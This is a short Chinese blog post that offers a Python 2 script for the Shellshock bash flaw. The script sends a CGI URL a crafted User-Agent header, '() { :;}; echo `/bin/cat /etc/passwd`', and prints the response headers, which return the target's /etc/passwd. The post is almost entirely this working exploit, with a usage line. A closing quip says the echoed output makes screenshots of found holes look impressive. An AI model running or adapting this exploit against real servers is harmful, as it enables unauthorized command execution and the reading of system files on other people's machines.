Bash命令执行漏洞利用小脚本

admin

代码如下：

1. #coding:utf-8
   
2. import urllib,httplib
   
3. import sys,re,urlparse
   
4. #author:nx4dm1n
   
5. #website:http://www.nxadmin.com
   
6. 
   
7. def bash_exp(url):
   
8.     urlsp=urlparse.urlparse(url)
   
9.     hostname=urlsp.netloc
   
10.     urlpath=urlsp.path
    
11.     conn=httplib.HTTPConnection(hostname)
    
12.     headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
    
13.     conn.request("GET",urlpath,headers=headers)
    
14.     res=conn.getresponse()
    
15.     res=res.getheaders()
    
16.     for passwdstr in res:
    
17.         print passwdstr[0]+':'+passwdstr[1]
    
18.          
    
19.      
    
20. if __name__=='__main__':
    
21.      
    
22.     #带http的url
    
23.     if len(sys.argv)<2:
    
24.         print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
    
25.         sys.exit()
    
26.     else:
    
27.         bash_exp(sys.argv[1])

复制代码

效果如图：


没啥亮点，主要就是有回显，挖个洞，用这个截个图，就顿时觉得高大上了。没回显的截图看着不高大上！^_^